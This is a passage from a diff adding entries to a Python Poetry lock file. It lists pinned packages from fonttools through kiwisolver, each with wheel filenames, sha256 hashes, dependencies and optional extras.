+ {file = "fonttools-4.55.3-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:bdcc9f04b36c6c20978d3f060e5323a43f6222accc4e7fcbef3f428e216d96af"},
+ {file = "fonttools-4.55.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c3ca99e0d460eff46e033cd3992a969658c3169ffcd533e0a39c63a38beb6831"},
+ {file = "fonttools-4.55.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:22f38464daa6cdb7b6aebd14ab06609328fe1e9705bb0fcc7d1e69de7109ee02"},
+ {file = "fonttools-4.55.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ed63959d00b61959b035c7d47f9313c2c1ece090ff63afea702fe86de00dbed4"},
+ {file = "fonttools-4.55.3-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:5e8d657cd7326eeaba27de2740e847c6b39dde2f8d7cd7cc56f6aad404ddf0bd"},
+ {file = "fonttools-4.55.3-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:fb594b5a99943042c702c550d5494bdd7577f6ef19b0bc73877c948a63184a32"},
+ {file = "fonttools-4.55.3-cp39-cp39-win32.whl", hash = "sha256:dc5294a3d5c84226e3dbba1b6f61d7ad813a8c0238fceea4e09aa04848c3d851"},
+ {file = "fonttools-4.55.3-cp39-cp39-win_amd64.whl", hash = "sha256:aedbeb1db64496d098e6be92b2e63b5fac4e53b1b92032dfc6988e1ea9134a4d"},
+ {file = "fonttools-4.55.3-py3-none-any.whl", hash = "sha256:f412604ccbeee81b091b420272841e5ec5ef68967a9790e80bffd0e30b8e2977"},
+ {file = "fonttools-4.55.3.tar.gz", hash = "sha256:3983313c2a04d6cc1fe9251f8fc647754cf49a61dac6cb1e7249ae67afaafc45"},
+]
+
+[package.extras]
+all = ["brotli (>=1.0.1)", "brotlicffi (>=0.8.0)", "fs (>=2.2.0,<3)", "lxml (>=4.0)", "lz4 (>=1.7.4.2)", "matplotlib", "munkres", "pycairo", "scipy", "skia-pathops (>=0.5.0)", "sympy", "uharfbuzz (>=0.23.0)", "unicodedata2 (>=15.1.0)", "xattr", "zopfli (>=0.1.4)"]
+graphite = ["lz4 (>=1.7.4.2)"]
+interpolatable = ["munkres", "pycairo", "scipy"]
+lxml = ["lxml (>=4.0)"]
+pathops = ["skia-pathops (>=0.5.0)"]
+plot = ["matplotlib"]
+repacker = ["uharfbuzz (>=0.23.0)"]
+symfont = ["sympy"]
+type1 = ["xattr"]
+ufo = ["fs (>=2.2.0,<3)"]
+unicode = ["unicodedata2 (>=15.1.0)"]
+woff = ["brotli (>=1.0.1)", "brotlicffi (>=0.8.0)", "zopfli (>=0.1.4)"]
+
+[[package]]
+name = "fsspec"
+version = "2024.12.0"
+description = "File-system specification"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "fsspec-2024.12.0-py3-none-any.whl", hash = "sha256:b520aed47ad9804237ff878b504267a3b0b441e97508bd6d2d8774e3db85cee2"},
+ {file = "fsspec-2024.12.0.tar.gz", hash = "sha256:670700c977ed2fb51e0d9f9253177ed20cbde4a3e5c0283cc5385b5870c8533f"},
+]
+
+[package.extras]
+abfs = ["adlfs"]
+adl = ["adlfs"]
+arrow = ["pyarrow (>=1)"]
+dask = ["dask", "distributed"]
+dev = ["pre-commit", "ruff"]
+doc = ["numpydoc", "sphinx", "sphinx-design", "sphinx-rtd-theme", "yarl"]
+dropbox = ["dropbox", "dropboxdrivefs", "requests"]
+full = ["adlfs", "aiohttp (!=4.0.0a0,!=4.0.0a1)", "dask", "distributed", "dropbox", "dropboxdrivefs", "fusepy", "gcsfs", "libarchive-c", "ocifs", "panel", "paramiko", "pyarrow (>=1)", "pygit2", "requests", "s3fs", "smbprotocol", "tqdm"]
+fuse = ["fusepy"]
+gcs = ["gcsfs"]
+git = ["pygit2"]
+github = ["requests"]
+gs = ["gcsfs"]
+gui = ["panel"]
+hdfs = ["pyarrow (>=1)"]
+http = ["aiohttp (!=4.0.0a0,!=4.0.0a1)"]
+libarchive = ["libarchive-c"]
+oci = ["ocifs"]
+s3 = ["s3fs"]
+sftp = ["paramiko"]
+smb = ["smbprotocol"]
+ssh = ["paramiko"]
+test = ["aiohttp (!=4.0.0a0,!=4.0.0a1)", "numpy", "pytest", "pytest-asyncio (!=0.22.0)", "pytest-benchmark", "pytest-cov", "pytest-mock", "pytest-recording", "pytest-rerunfailures", "requests"]
+test-downstream = ["aiobotocore (>=2.5.4,<3.0.0)", "dask-expr", "dask[dataframe,test]", "moto[server] (>4,<5)", "pytest-timeout", "xarray"]
+test-full = ["adlfs", "aiohttp (!=4.0.0a0,!=4.0.0a1)", "cloudpickle", "dask", "distributed", "dropbox", "dropboxdrivefs", "fastparquet", "fusepy", "gcsfs", "jinja2", "kerchunk", "libarchive-c", "lz4", "notebook", "numpy", "ocifs", "pandas", "panel", "paramiko", "pyarrow", "pyarrow (>=1)", "pyftpdlib", "pygit2", "pytest", "pytest-asyncio (!=0.22.0)", "pytest-benchmark", "pytest-cov", "pytest-mock", "pytest-recording", "pytest-rerunfailures", "python-snappy", "requests", "smbprotocol", "tqdm", "urllib3", "zarr", "zstandard"]
+tqdm = ["tqdm"]
+
+[[package]]
+name = "ghp-import"
+version = "2.1.0"
+description = "Copy your docs directly to the gh-pages branch."
+optional = false
+python-versions = "*"
+files = [
+ {file = "ghp-import-2.1.0.tar.gz", hash = "sha256:9c535c4c61193c2df8871222567d7fd7e5014d835f97dc7b7439069e2413d343"},
+ {file = "ghp_import-2.1.0-py3-none-any.whl", hash = "sha256:8337dd7b50877f163d4c0289bc1f1c7f127550241988d568c1db512c4324a619"},
+]
+
+[package.dependencies]
+python-dateutil = ">=2.8.1"
+
+[package.extras]
+dev = ["flake8", "markdown", "twine", "wheel"]
+
+[[package]]
+name = "griffe"
+version = "1.4.0"
+description = "Signatures for entire Python programs. Extract the structure, the frame, the skeleton of your project, to generate API documentation or find breaking changes in your API."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "griffe-1.4.0-py3-none-any.whl", hash = "sha256:e589de8b8c137e99a46ec45f9598fc0ac5b6868ce824b24db09c02d117b89bc5"},
+ {file = "griffe-1.4.0.tar.gz", hash = "sha256:8fccc585896d13f1221035d32c50dec65830c87d23f9adb9b1e6f3d63574f7f5"},
+]
+
+[package.dependencies]
+astunparse = {version = ">=1.6", markers = "python_version < \"3.9\""}
+colorama = ">=0.4"
+
+[[package]]
+name = "huggingface-hub"
+version = "0.27.1"
+description = "Client library to download and publish models, datasets and other repos on the huggingface.co hub"
+optional = false
+python-versions = ">=3.8.0"
+files = [
+ {file = "huggingface_hub-0.27.1-py3-none-any.whl", hash = "sha256:1c5155ca7d60b60c2e2fc38cbb3ffb7f7c3adf48f824015b219af9061771daec"},
+ {file = "huggingface_hub-0.27.1.tar.gz", hash = "sha256:c004463ca870283909d715d20f066ebd6968c2207dae9393fdffb3c1d4d8f98b"},
+]
+
+[package.dependencies]
+filelock = "*"
+fsspec = ">=2023.5.0"
+packaging = ">=20.9"
+pyyaml = ">=5.1"
+requests = "*"
+tqdm = ">=4.42.1"
+typing-extensions = ">=3.7.4.3"
+
+[package.extras]
+all = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "fastapi", "gradio (>=4.0.0)", "jedi", "libcst (==1.4.0)", "mypy (==1.5.1)", "numpy", "pytest (>=8.1.1,<8.2.2)", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-mock", "pytest-rerunfailures", "pytest-vcr", "pytest-xdist", "ruff (>=0.5.0)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "typing-extensions (>=4.8.0)", "urllib3 (<2.0)"]
+cli = ["InquirerPy (==0.3.4)"]
+dev = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "fastapi", "gradio (>=4.0.0)", "jedi", "libcst (==1.4.0)", "mypy (==1.5.1)", "numpy", "pytest (>=8.1.1,<8.2.2)", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-mock", "pytest-rerunfailures", "pytest-vcr", "pytest-xdist", "ruff (>=0.5.0)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "typing-extensions (>=4.8.0)", "urllib3 (<2.0)"]
+fastai = ["fastai (>=2.4)", "fastcore (>=1.3.27)", "toml"]
+hf-transfer = ["hf-transfer (>=0.1.4)"]
+inference = ["aiohttp"]
+quality = ["libcst (==1.4.0)", "mypy (==1.5.1)", "ruff (>=0.5.0)"]
+tensorflow = ["graphviz", "pydot", "tensorflow"]
+tensorflow-testing = ["keras (<3.0)", "tensorflow"]
+testing = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "fastapi", "gradio (>=4.0.0)", "jedi", "numpy", "pytest (>=8.1.1,<8.2.2)", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-mock", "pytest-rerunfailures", "pytest-vcr", "pytest-xdist", "soundfile", "urllib3 (<2.0)"]
+torch = ["safetensors[torch]", "torch"]
+typing = ["types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "typing-extensions (>=4.8.0)"]
+
+[[package]]
+name = "identify"
+version = "2.6.1"
+description = "File identification library for Python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "identify-2.6.1-py2.py3-none-any.whl", hash = "sha256:53863bcac7caf8d2ed85bd20312ea5dcfc22226800f6d6881f232d861db5a8f0"},
+ {file = "identify-2.6.1.tar.gz", hash = "sha256:91478c5fb7c3aac5ff7bf9b4344f803843dc586832d5f110d672b19aa1984c98"},
+]
+
+[package.extras]
+license = ["ukkonen"]
+
+[[package]]
+name = "idna"
+version = "3.10"
+description = "Internationalized Domain Names in Applications (IDNA)"
+optional = false
+python-versions = ">=3.6"
+files = [
+ {file = "idna-3.10-py3-none-any.whl", hash = "sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3"},
+ {file = "idna-3.10.tar.gz", hash = "sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9"},
+]
+
+[package.extras]
+all = ["flake8 (>=7.1.1)", "mypy (>=1.11.2)", "pytest (>=8.3.2)", "ruff (>=0.6.2)"]
+
+[[package]]
+name = "importlib-metadata"
+version = "8.5.0"
+description = "Read metadata from Python packages"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "importlib_metadata-8.5.0-py3-none-any.whl", hash = "sha256:45e54197d28b7a7f1559e60b95e7c567032b602131fbd588f1497f47880aa68b"},
+ {file = "importlib_metadata-8.5.0.tar.gz", hash = "sha256:71522656f0abace1d072b9e5481a48f07c138e00f079c38c8f883823f9c26bd7"},
+]
+
+[package.dependencies]
+zipp = ">=3.20"
+
+[package.extras]
+check = ["pytest-checkdocs (>=2.4)", "pytest-ruff (>=0.2.1)"]
+cover = ["pytest-cov"]
+doc = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"]
+enabler = ["pytest-enabler (>=2.2)"]
+perf = ["ipython"]
+test = ["flufl.flake8", "importlib-resources (>=1.3)", "jaraco.test (>=5.4)", "packaging", "pyfakefs", "pytest (>=6,!=8.1.*)", "pytest-perf (>=0.9.2)"]
+type = ["pytest-mypy"]
+
+[[package]]
+name = "importlib-resources"
+version = "6.4.5"
+description = "Read resources from Python packages"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "importlib_resources-6.4.5-py3-none-any.whl", hash = "sha256:ac29d5f956f01d5e4bb63102a5a19957f1b9175e45649977264a1416783bb717"},
+ {file = "importlib_resources-6.4.5.tar.gz", hash = "sha256:980862a1d16c9e147a59603677fa2aa5fd82b87f223b6cb870695bcfce830065"},
+]
+
+[package.dependencies]
+zipp = {version = ">=3.1.0", markers = "python_version < \"3.10\""}
+
+[package.extras]
+check = ["pytest-checkdocs (>=2.4)", "pytest-ruff (>=0.2.1)"]
+cover = ["pytest-cov"]
+doc = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"]
+enabler = ["pytest-enabler (>=2.2)"]
+test = ["jaraco.test (>=5.4)", "pytest (>=6,!=8.1.*)", "zipp (>=3.17)"]
+type = ["pytest-mypy"]
+
+[[package]]
+name = "iniconfig"
+version = "2.0.0"
+description = "brain-dead simple config-ini parsing"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "iniconfig-2.0.0-py3-none-any.whl", hash = "sha256:b6a85871a79d2e3b22d2d1b94ac2824226a63c6b741c88f7ae975f18b6778374"},
+ {file = "iniconfig-2.0.0.tar.gz", hash = "sha256:2d91e135bf72d31a410b17c16da610a82cb55f6b0477d1a902134b24a455b8b3"},
+]
+
+[[package]]
+name = "jinja2"
+version = "3.1.5"
+description = "A very fast and expressive template engine."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "jinja2-3.1.5-py3-none-any.whl", hash = "sha256:aba0f4dc9ed8013c424088f68a5c226f7d6097ed89b246d7749c2ec4175c6adb"},
+ {file = "jinja2-3.1.5.tar.gz", hash = "sha256:8fefff8dc3034e27bb80d67c671eb8a9bc424c0ef4c0826edbff304cceff43bb"},
+]
+
+[package.dependencies]
+MarkupSafe = ">=2.0"
+
+[package.extras]
+i18n = ["Babel (>=2.7)"]
+
+[[package]]
+name = "kiwisolver"
+version = "1.4.7"
+description = "A fast implementation of the Cassowary constraint solver"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "kiwisolver-1.4.7-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:8a9c83f75223d5e48b0bc9cb1bf2776cf01563e00ade8775ffe13b0b6e1af3a6"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:58370b1ffbd35407444d57057b57da5d6549d2d854fa30249771775c63b5fe17"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:aa0abdf853e09aff551db11fce173e2177d00786c688203f52c87ad7fcd91ef9"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:8d53103597a252fb3ab8b5845af04c7a26d5e7ea8122303dd7a021176a87e8b9"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:88f17c5ffa8e9462fb79f62746428dd57b46eb931698e42e990ad63103f35e6c"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:88a9ca9c710d598fd75ee5de59d5bda2684d9db36a9f50b6125eaea3969c2599"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f4d742cb7af1c28303a51b7a27aaee540e71bb8e24f68c736f6f2ffc82f2bf05"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e28c7fea2196bf4c2f8d46a0415c77a1c480cc0724722f23d7410ffe9842c407"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:e968b84db54f9d42046cf154e02911e39c0435c9801681e3fc9ce8a3c4130278"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:0c18ec74c0472de033e1bebb2911c3c310eef5649133dd0bedf2a169a1b269e5"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_ppc64le.whl", hash = "sha256:8f0ea6da6d393d8b2e187e6a5e3fb81f5862010a40c3945e2c6d12ae45cfb2ad"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_s390x.whl", hash = "sha256:f106407dda69ae456dd1227966bf445b157ccc80ba0dff3802bb63f30b74e895"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:84ec80df401cfee1457063732d90022f93951944b5b58975d34ab56bb150dfb3"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-win32.whl", hash = "sha256:71bb308552200fb2c195e35ef05de12f0c878c07fc91c270eb3d6e41698c3bcc"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-win_amd64.whl", hash = "sha256:44756f9fd339de0fb6ee4f8c1696cfd19b2422e0d70b4cefc1cc7f1f64045a8c"},
+ {file = "kiwisolver-1.4.7-cp310-cp310-win_arm64.whl", hash = "sha256:78a42513018c41c2ffd262eb676442315cbfe3c44eed82385c2ed043bc63210a"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:d2b0e12a42fb4e72d509fc994713d099cbb15ebf1103545e8a45f14da2dfca54"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:2a8781ac3edc42ea4b90bc23e7d37b665d89423818e26eb6df90698aa2287c95"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:46707a10836894b559e04b0fd143e343945c97fd170d69a2d26d640b4e297935"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ef97b8df011141c9b0f6caf23b29379f87dd13183c978a30a3c546d2c47314cb"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3ab58c12a2cd0fc769089e6d38466c46d7f76aced0a1f54c77652446733d2d02"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:803b8e1459341c1bb56d1c5c010406d5edec8a0713a0945851290a7930679b51"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f9a9e8a507420fe35992ee9ecb302dab68550dedc0da9e2880dd88071c5fb052"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:18077b53dc3bb490e330669a99920c5e6a496889ae8c63b58fbc57c3d7f33a18"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:6af936f79086a89b3680a280c47ea90b4df7047b5bdf3aa5c524bbedddb9e545"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:3abc5b19d24af4b77d1598a585b8a719beb8569a71568b66f4ebe1fb0449460b"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_ppc64le.whl", hash = "sha256:933d4de052939d90afbe6e9d5273ae05fb836cc86c15b686edd4b3560cc0ee36"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_s390x.whl", hash = "sha256:65e720d2ab2b53f1f72fb5da5fb477455905ce2c88aaa671ff0a447c2c80e8e3"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:3bf1ed55088f214ba6427484c59553123fdd9b218a42bbc8c6496d6754b1e523"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-win32.whl", hash = "sha256:4c00336b9dd5ad96d0a558fd18a8b6f711b7449acce4c157e7343ba92dd0cf3d"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-win_amd64.whl", hash = "sha256:929e294c1ac1e9f615c62a4e4313ca1823ba37326c164ec720a803287c4c499b"},
+ {file = "kiwisolver-1.4.7-cp311-cp311-win_arm64.whl", hash = "sha256:e33e8fbd440c917106b237ef1a2f1449dfbb9b6f6e1ce17c94cd6a1e0d438376"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:5360cc32706dab3931f738d3079652d20982511f7c0ac5711483e6eab08efff2"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:942216596dc64ddb25adb215c3c783215b23626f8d84e8eff8d6d45c3f29f75a"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:48b571ecd8bae15702e4f22d3ff6a0f13e54d3d00cd25216d5e7f658242065ee"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ad42ba922c67c5f219097b28fae965e10045ddf145d2928bfac2eb2e17673640"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:612a10bdae23404a72941a0fc8fa2660c6ea1217c4ce0dbcab8a8f6543ea9e7f"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9e838bba3a3bac0fe06d849d29772eb1afb9745a59710762e4ba3f4cb8424483"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:22f499f6157236c19f4bbbd472fa55b063db77a16cd74d49afe28992dff8c258"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:693902d433cf585133699972b6d7c42a8b9f8f826ebcaf0132ff55200afc599e"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:4e77f2126c3e0b0d055f44513ed349038ac180371ed9b52fe96a32aa071a5107"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:657a05857bda581c3656bfc3b20e353c232e9193eb167766ad2dc58b56504948"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:4bfa75a048c056a411f9705856abfc872558e33c055d80af6a380e3658766038"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:34ea1de54beef1c104422d210c47c7d2a4999bdecf42c7b5718fbe59a4cac383"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:90da3b5f694b85231cf93586dad5e90e2d71b9428f9aad96952c99055582f520"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-win32.whl", hash = "sha256:18e0cca3e008e17fe9b164b55735a325140a5a35faad8de92dd80265cd5eb80b"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-win_amd64.whl", hash = "sha256:58cb20602b18f86f83a5c87d3ee1c766a79c0d452f8def86d925e6c60fbf7bfb"},
+ {file = "kiwisolver-1.4.7-cp312-cp312-win_arm64.whl", hash = "sha256:f5a8b53bdc0b3961f8b6125e198617c40aeed638b387913bf1ce78afb1b0be2a"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:2e6039dcbe79a8e0f044f1c39db1986a1b8071051efba3ee4d74f5b365f5226e"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:a1ecf0ac1c518487d9d23b1cd7139a6a65bc460cd101ab01f1be82ecf09794b6"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:7ab9ccab2b5bd5702ab0803676a580fffa2aa178c2badc5557a84cc943fcf750"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:f816dd2277f8d63d79f9c8473a79fe54047bc0467754962840782c575522224d"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cf8bcc23ceb5a1b624572a1623b9f79d2c3b337c8c455405ef231933a10da379"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:dea0bf229319828467d7fca8c7c189780aa9ff679c94539eed7532ebe33ed37c"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7c06a4c7cf15ec739ce0e5971b26c93638730090add60e183530d70848ebdd34"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:913983ad2deb14e66d83c28b632fd35ba2b825031f2fa4ca29675e665dfecbe1"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:5337ec7809bcd0f424c6b705ecf97941c46279cf5ed92311782c7c9c2026f07f"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:4c26ed10c4f6fa6ddb329a5120ba3b6db349ca192ae211e882970bfc9d91420b"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_ppc64le.whl", hash = "sha256:c619b101e6de2222c1fcb0531e1b17bbffbe54294bfba43ea0d411d428618c27"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_s390x.whl", hash = "sha256:073a36c8273647592ea332e816e75ef8da5c303236ec0167196793eb1e34657a"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:3ce6b2b0231bda412463e152fc18335ba32faf4e8c23a754ad50ffa70e4091ee"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-win32.whl", hash = "sha256:f4c9aee212bc89d4e13f58be11a56cc8036cabad119259d12ace14b34476fd07"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-win_amd64.whl", hash = "sha256:8a3ec5aa8e38fc4c8af308917ce12c536f1c88452ce554027e55b22cbbfbff76"},
+ {file = "kiwisolver-1.4.7-cp313-cp313-win_arm64.whl", hash = "sha256:76c8094ac20ec259471ac53e774623eb62e6e1f56cd8690c67ce6ce4fcb05650"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5d5abf8f8ec1f4e22882273c423e16cae834c36856cac348cfbfa68e01c40f3a"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:aeb3531b196ef6f11776c21674dba836aeea9d5bd1cf630f869e3d90b16cfade"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b7d755065e4e866a8086c9bdada157133ff466476a2ad7861828e17b6026e22c"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:08471d4d86cbaec61f86b217dd938a83d85e03785f51121e791a6e6689a3be95"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7bbfcb7165ce3d54a3dfbe731e470f65739c4c1f85bb1018ee912bae139e263b"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:5d34eb8494bea691a1a450141ebb5385e4b69d38bb8403b5146ad279f4b30fa3"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:9242795d174daa40105c1d86aba618e8eab7bf96ba8c3ee614da8302a9f95503"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:a0f64a48bb81af7450e641e3fe0b0394d7381e342805479178b3d335d60ca7cf"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:8e045731a5416357638d1700927529e2b8ab304811671f665b225f8bf8d8f933"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:4322872d5772cae7369f8351da1edf255a604ea7087fe295411397d0cfd9655e"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_ppc64le.whl", hash = "sha256:e1631290ee9271dffe3062d2634c3ecac02c83890ada077d225e081aca8aab89"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_s390x.whl", hash = "sha256:edcfc407e4eb17e037bca59be0e85a2031a2ac87e4fed26d3e9df88b4165f92d"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:4d05d81ecb47d11e7f8932bd8b61b720bf0b41199358f3f5e36d38e28f0532c5"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-win32.whl", hash = "sha256:b38ac83d5f04b15e515fd86f312479d950d05ce2368d5413d46c088dda7de90a"},
+ {file = "kiwisolver-1.4.7-cp38-cp38-win_amd64.whl", hash = "sha256:d83db7cde68459fc803052a55ace60bea2bae361fc3b7a6d5da07e11954e4b09"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:3f9362ecfca44c863569d3d3c033dbe8ba452ff8eed6f6b5806382741a1334bd"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:e8df2eb9b2bac43ef8b082e06f750350fbbaf2887534a5be97f6cf07b19d9583"},
+ {file = "kiwisolver-1.4.7-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:f32d6edbc638cde7652bd690c3e728b25332acbadd7cad670cc4a02558d9c417"},
